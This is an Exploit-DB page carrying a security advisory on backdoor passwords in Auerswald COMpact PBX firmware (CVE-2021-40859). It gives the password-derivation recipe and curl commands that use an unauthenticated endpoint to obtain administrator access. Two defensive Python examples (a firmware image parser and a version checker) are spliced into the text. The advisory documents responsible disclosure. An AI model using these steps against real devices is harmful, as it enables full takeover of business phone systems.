Auerswald COMpact 8.0B – Multiple Backdoors

  • Author: RedTeam Pentesting GmbH
    Date: 2021-12-06
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50569/
  • # Exploit Title: Auerswald COMpact 8.0B - Multiple Backdoors
    # Date: 06/12/2021
    # Exploit Author: RedTeam Pentesting GmbH
    
    Advisory: Auerswald COMpact Multiple Backdoors
    
    
    RedTeam Pentesting discovered several backdoors in the firmware for the
    Auerswald COMpact 5500R PBX. These backdoors allow attackers who are
    able to access the web-based management application full administrative
    access to the device.
    
    
    Details
    =======
    
    Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")
    Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP)
    Fixed Versions: 8.2B, 4.0T
    Vulnerability Type: Backdoor
    Security Risk: high
    Vendor URL: https://www.auerswald.de/en/product/compact-5500r
    Vendor Status: fixed version released
    Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007
    Advisory Status: published
    CVE: CVE-2021-40859
    CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859
    
    
    Introduction
    ============
    
    "Fully modular VoIP appliance for more efficient communication processes
    With the COMpact 5500R, you are originally equipped for everyday
    business - now and in the future.
    
    The fully modular architecture with 80 IP channels and all the functions
    of a large ITC server allows up to 112 subscribers and thus scales with
    your company.
    
    Continuous maintenance and expansion of the system software makes this
    versatile IP server a future-proof investment in any business
    communication."
    
    (from the vendor's homepage)
    
    
    More Details
    ============
    
    Two backdoor passwords were found in the firmware of the COMpact 5500R
    PBX. One backdoor password is for the secret user "Schandelah", the
    other can be used for the highest-privileged user "Admin". No way was
    discovered to disable these backdoors.
    
    
    Proof of Concept
    ================
    
    The firmware for the COMpact 5500R can be downloaded from the vendor's
    homepage[1]. The following details refer to firmware version 7.8A, but
    the latest firmware at the time of writing (8.0B) is affected as well.
    
    Inspecting the downloaded file reveals that it is compressed and can be
    extracted with the program "gunzip":
    
    ------------------------------------------------------------------------
    $ file 7_8A_002_COMpact5500.rom
    7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23
    15:04:43 2020, from Unix, original size 196976698
    
    $ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz
    
    $ gunzip 7_8A_002_COMpact5500.gz
    ------------------------------------------------------------------------
    
    Analysing the resulting file again shows that it is an image file in the
    format required by the bootloader "Das U-Boot"[2], a popular bootloader
    for embedded devices:
    
    ------------------------------------------------------------------------
    $ file 7_8A_002_COMpact5500.rom
    
    7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM, Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38 2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0xCECA93E8, Data CRC: 0x99E65DF1
    ------------------------------------------------------------------------
    
    The program "dumpimage" (included with u-boot) can be used to list the
    partitions in the image file:
    
    ------------------------------------------------------------------------
    $ dumpimage -l 7_8A_002_COMpact5500.rom
    Image Name:   CP5500 125850
    Created:      Wed Sep 23 17:04:38 2020
    Image Type:   ARM Linux Multi-File Image (uncompressed)
    Data Size:    196976634 Bytes = 192359.99 KiB = 187.85 MiB
    Load Address: 00000000
    Entry Point:  00000000
    Contents:
       Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB
       Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB
    ------------------------------------------------------------------------
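The layout that `file` and `dumpimage` report above is the legacy U-Boot image format: a 64-byte big-endian header (magic, header CRC, timestamp, data size, load address, entry point, data CRC, OS, architecture, type, compression, 32-byte name) followed by the payload; for a multi-file image the payload starts with a zero-terminated table of part sizes, and mkimage pads every part except the last to a 4-byte boundary. The following Python is an added example, not part of the advisory and not vendor or U-Boot code: it builds a small multi-file image in memory (constructed, with a made-up name), parses the header, verifies both CRCs and splits the parts, which is the integrity check a defender wants before trusting or inspecting a downloaded firmware image.

```python
import struct
import zlib
from typing import Dict, List

# Legacy U-Boot image header: 64 bytes, all multi-byte fields big-endian.
IH_MAGIC = 0x27051956
IH_OS_LINUX, IH_ARCH_ARM, IH_TYPE_MULTI, IH_COMP_NONE = 5, 2, 4, 0
# magic, hcrc, time, size, load, ep, dcrc, os, arch, type, comp, name[32]
HEADER_FMT = ">7I4B32s"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 64


def multi_data_size(sizes: List[int]) -> int:
    """ih_size of a multi-file payload: a size table (one word per part plus a
    zero terminator) followed by the parts, every part except the last padded
    to 4 bytes. This is why 512 + 196976110 + 12 = 196976634 in the dumpimage
    listing of the vendor image."""
    total = 4 * (len(sizes) + 1)
    for i, n in enumerate(sizes):
        total += n + (-n % 4 if i < len(sizes) - 1 else 0)
    return total


def build_uimage(name: bytes, parts: List[bytes], timestamp: int = 0) -> bytes:
    """Build a constructed multi-file uImage for testing (not vendor firmware)."""
    table = b"".join(struct.pack(">I", len(p)) for p in parts) + struct.pack(">I", 0)
    body = b""
    for i, p in enumerate(parts):
        body += p
        if i < len(parts) - 1:
            body += b"\0" * (-len(p) % 4)
    data = table + body
    fields = [IH_MAGIC, 0, timestamp, len(data), 0, 0, zlib.crc32(data) & 0xFFFFFFFF,
              IH_OS_LINUX, IH_ARCH_ARM, IH_TYPE_MULTI, IH_COMP_NONE, name]
    # ih_hcrc is computed over the header with the hcrc field itself set to zero.
    fields[1] = zlib.crc32(struct.pack(HEADER_FMT, *fields)) & 0xFFFFFFFF
    return struct.pack(HEADER_FMT, *fields) + data


def parse_uimage(blob: bytes) -> Dict:
    """Parse the header, verify header and data CRCs and split a multi-file payload."""
    if len(blob) < HEADER_LEN:
        raise ValueError("too short for a uImage header")
    (magic, hcrc, ts, size, load, ep, dcrc,
     os_, arch, typ, comp, name) = struct.unpack(HEADER_FMT, blob[:HEADER_LEN])
    if magic != IH_MAGIC:
        raise ValueError("bad magic 0x%08x" % magic)
    data = blob[HEADER_LEN:HEADER_LEN + size]
    if len(data) != size:
        raise ValueError("image truncated: header claims %d bytes, %d present" % (size, len(data)))
    header_zeroed = blob[:4] + b"\0\0\0\0" + blob[8:HEADER_LEN]
    info = {
        "name": name.rstrip(b"\0").decode("ascii", "replace"),
        "os": os_, "arch": arch, "type": typ, "comp": comp,
        "time": ts, "size": size, "load": load, "ep": ep,
        "hcrc_ok": (zlib.crc32(header_zeroed) & 0xFFFFFFFF) == hcrc,
        "dcrc_ok": (zlib.crc32(data) & 0xFFFFFFFF) == dcrc,
        "parts": [],
    }
    if typ == IH_TYPE_MULTI:
        # Walk the zero-terminated size table, then slice out each part.
        sizes, off = [], 0
        while True:
            (n,) = struct.unpack(">I", data[off:off + 4])
            off += 4
            if n == 0:
                break
            sizes.append(n)
        for i, n in enumerate(sizes):
            info["parts"].append(data[off:off + n])
            off += n + (-n % 4 if i < len(sizes) - 1 else 0)
    return info


if __name__ == "__main__":
    img = build_uimage(b"constructed test image", [b"\x01" * 512, b"R" * 1001])
    info = parse_uimage(img)
    print(info["name"], [len(p) for p in info["parts"]], info["hcrc_ok"], info["dcrc_ok"])
```

Running `parse_uimage` on a real `.rom` after `gunzip` gives the same part sizes that `dumpimage -l` prints; a header or data CRC mismatch means the file was corrupted or modified in transit and should not be mounted or flashed.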
    
    The larger partition then was extracted into the file "rootfs" as
    follows:
    
    ------------------------------------------------------------------------
    $ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs
    ------------------------------------------------------------------------
    
    Contained in the file is an ext2-compatible file system, which was
    mounted at "/mnt" and inspected:
    
    ------------------------------------------------------------------------
    $ file rootfs
    
    rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca-f302d7f20ef1, volume name "7.8A_002_125850."
    
    $ sudo mount -o loop,ro rootfs /mnt
    
    $ cat /mnt/etc/passwd
    root::0:0:root:/root:/bin/sh
    netstorage::1:1::/data/ftpd:/bin/false
    web::2:2::/opt/auerswald/lighttpd:/bin/false
    ------------------------------------------------------------------------
    
    The PBX runs the web server lighttpd[3]; its configuration files are
    located in the folder "/opt/auerswald/lighttpd". The web server forwards
    most requests via FastCGI to the program "/opt/auerswald/web/webserver",
    which can then be analysed, for example with the reverse engineering
    tool Ghidra[4].
    
    The manual for the PBX reveals that in order to manage the device, users
    need to log in with the username "sub-admin". When this string is
    searched within the program in Ghidra, the function which checks
    passwords on login can be identified.
    
    It can easily be seen that besides the username "sub-admin" the function
    also checks for the hard-coded username "Schandelah", which is the
    village of Auerswald's headquarters. Further analysis revealed that the
    corresponding password for this username is derived by concatenating the
    PBX's serial number, the string "r2d2" and the current date, hashing the
    result with the MD5 hash algorithm and taking the first seven lower-case
    hex characters of the digest.
    
    All data needed to derive the password can be accessed without
    authentication by requesting the path "/about_state". The same path is
    used by the page the PBX redirects users to when they abort the password
    prompt (output shortened and formatted for readability):
    
    ------------------------------------------------------------------------
    $ curl --include https://192.168.1.2/about_state
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    [...]
    
    {
    "pbx": "COMpact 5500R",
    "pbxType": 35,
    "pbxId": 0,
    "version": "Version 7.8A - Build 002",
    "serial": "1234123412",
    "date": "30.08.2021",
    [...]
    }
    ------------------------------------------------------------------------
    
    The password can be derived as follows:
    
    ------------------------------------------------------------------------
    $ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
    1432d89
    ------------------------------------------------------------------------
    
    This password can then be used for authentication:
    
    ------------------------------------------------------------------------
    $ curl --include --user 'Schandelah:1432d89' --anyauth \
    https://192.168.1.2/tree
    
    HTTP/1.1 302 Found
    Location: /statics/html/page_servicetools.html
    Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/
    [...]
    ------------------------------------------------------------------------
    
    Next, the endpoint "/logstatus_state" can be queried using the returned
    session ID to check the access level:
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \
    https://192.168.1.2/logstatus_state
    
    HTTP/1.1 200 OK
    X-XSS-Protection: 1
    Content-Type: application/json; charset=utf-8;
    [...]
    
    {"logstatus":"Haendler"}
    ------------------------------------------------------------------------
    
    The returned access level is "Haendler" (reseller). After login, the web
    server redirects to a special service page at the path
    "/statics/html/page_servicetools.html". Among other things, this page
    allows downloading a backup of all data on the device, configuring audio
    recording, and resetting the password, PIN and token of the user "Admin".
    Regular administrative functions cannot be accessed directly with this
    user account.
    
    When inspecting the password checking function, a second backdoor can be
    found. When the username "Admin" is specified, the given password is
    tested against the configured password as well as a password derived in
    a similar way from the PBX's serial number, the string "r2d2", the
    current date and the configured language. The MD5 hash is taken and the
    specified password is tested against the first seven characters of the
    lower case hexadecimal hash.
    
    The backdoor password for the "Admin" user can be calculated as follows:
    
    ------------------------------------------------------------------------
    $ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}'
    92fcdd9
    ------------------------------------------------------------------------
    
    The server returns a session ID for that password and the username
    "Admin":
    
    ------------------------------------------------------------------------
    $ curl --user 'Admin:92fcdd9' --anyauth --include \
    https://192.168.1.2/tree
    
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/
    [...]
    
    [{"login":3,"userId":0,"userName":"",[...]}]
    ------------------------------------------------------------------------
    
    Checking the access level of the session reveals the status
    "Administrator":
    
    ------------------------------------------------------------------------
    $ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \
    https://192.168.1.2/logstatus_state
    
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8;
    [...]
    
    {"logstatus":"Administrator"}
    ------------------------------------------------------------------------
    
    
    Workaround
    ==========
    
    Disable or restrict access to the web-based management interface if
    possible.
    
    
    Fix
    ===
    
    Upgrade to a firmware version which corrects this vulnerability.
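The "/about_state" endpoint shown in the proof of concept reports the product name and the running firmware version without authentication, and the Details section lists the fixed versions per product family (8.2B for the COMpact 4000/5000(R)/5200(R)/5500R and COMmander 6000(R)(RX), 4.0T for the COMpact 3000 family). The following Python is an added example, not part of the advisory and not vendor code: it turns those two facts into an inventory check that tells an administrator whether a device still needs the upgrade. The sample JSON is the advisory's own redacted "/about_state" output; the product-prefix table is derived from the Details section, and the comparison assumes that the trailing letter of a version (A, B, ..., S, T) increments lexically, which the listed fixed versions are consistent with but which the page does not state explicitly.

```python
import json
import re
from typing import Dict, Optional, Tuple

# Fixed firmware versions from the advisory's Details section, keyed by the
# prefix of the "pbx" string returned by /about_state (assumed to start with
# the product family name, as in "COMpact 5500R").
FIXED_VERSIONS = (
    ("COMpact 3000", "4.0T"),
    ("COMpact 4000", "8.2B"),
    ("COMpact 5000", "8.2B"),
    ("COMpact 5200", "8.2B"),
    ("COMpact 5500R", "8.2B"),
    ("COMmander 6000", "8.2B"),
)

# "Version 7.8A - Build 002" -> (7, 8, "A"); the build number is not part of
# the fixed-version statement and is ignored.
VERSION_RE = re.compile(r"(\d+)\.(\d+)([A-Z])")

# Constructed from the /about_state output quoted in the advisory (serial and
# date are the advisory's sample values, not a real device).
SAMPLE_ABOUT_STATE = """{
  "pbx": "COMpact 5500R",
  "pbxType": 35,
  "pbxId": 0,
  "version": "Version 7.8A - Build 002",
  "serial": "1234123412",
  "date": "30.08.2021"
}"""


def parse_version(text: str) -> Tuple[int, int, str]:
    """Extract (major, minor, letter) so versions compare as tuples."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError("unrecognised version string: %r" % text)
    return int(m.group(1)), int(m.group(2)), m.group(3)


def fixed_version_for(pbx: str) -> Optional[str]:
    """Fixed version for the product family, or None if the product is not listed."""
    for prefix, fixed in FIXED_VERSIONS:
        if pbx.startswith(prefix):
            return fixed
    return None


def assess(about_state_json: str) -> Dict:
    """Decide from a /about_state response whether the device runs a version
    below the fixed one. 'vulnerable' is None for products not in the table."""
    state = json.loads(about_state_json)
    pbx = state["pbx"]
    running = parse_version(state["version"])
    fixed = fixed_version_for(pbx)
    if fixed is None:
        return {"pbx": pbx, "running": running, "fixed": None, "vulnerable": None}
    fixed_t = parse_version(fixed)
    return {"pbx": pbx, "running": running, "fixed": fixed_t,
            "vulnerable": running < fixed_t}


if __name__ == "__main__":
    # In practice the JSON comes from the device, e.g. curl https://<pbx>/about_state
    print(assess(SAMPLE_ABOUT_STATE))
```

Feeding the saved responses of every PBX on the network into `assess` gives a quick list of devices that still expose the backdoor accounts and should be upgraded first; the check is read-only and uses the same unauthenticated endpoint the advisory documents.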
    
    
    Security Risk
    =============
    
    By inspecting the firmware for the COMpact 5500R PBX, attackers can
    easily discover two backdoor passwords. One password is for the secret
    user account with the username "Schandelah", the other works as an
    alternative password for the user "Admin". Using the backdoor, attackers
    are granted access to the PBX with the highest privileges, enabling them
    to completely compromise the device. The passwords are derived from the
    serial number, the current date and the configured language.
    
    The backdoor passwords are not documented. They secretly coexist with a
    documented password recovery function supported by the vendor. No way
    was found to disable the backdoor access.
    
    All information needed to derive the passwords can be requested over the
    network without authentication, so attackers only require network access
    to the web-based management interface.
    
    Due to the ease of exploitation and severe consequences, the backdoor
    passwords are rated as a high risk.
    
    
    Timeline
    ========
    
    2021-08-26 Vulnerability identified
    2021-09-01 Customer approved disclosure to vendor
    2021-09-10 Vendor notified
    2021-09-10 CVE ID requested
    2021-09-10 CVE ID assigned
    2021-10-05 Vendor provides access to device with fixed firmware
    2021-10-11 Vendor provides fixed firmware
    2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
    2021-12-06 Advisory published
    
    
    References
    ==========
    
    [1] https://www.auerswald.de/de/support/download/firmware-compact-5500
    [2] https://www.denx.de/wiki/U-Boot
    [3] https://www.lighttpd.net
    [4] https://ghidra-sre.org
    
    
    RedTeam Pentesting GmbH
    =======================
    
    RedTeam Pentesting offers individual penetration tests performed by a
    team of specialised IT-security experts. In this way, security weaknesses
    in company networks or products are uncovered and can be fixed
    immediately.
    
    As there are only a few experts in this field, RedTeam Pentesting wants
    to share its knowledge and enhance the public knowledge with research in
    security-related areas. The results are made available as public
    security advisories.
    
    More information about RedTeam Pentesting can be found at:
    https://www.redteam-pentesting.de/
    
    
    Working at RedTeam Pentesting
    =============================
    
    RedTeam Pentesting is looking for penetration testers to join our team
    in Aachen, Germany. If you are interested please visit:
    https://www.redteam-pentesting.de/jobs/
    
    
    -- 
    RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
    Dennewartstr. 25-27                     Fax : +49 241 510081-99
    52068 Aachen                            https://www.redteam-pentesting.de
    Germany                                 Registergericht: Aachen HRB 14004
    Geschäftsführer: Patrick Hof, Jens Liebchen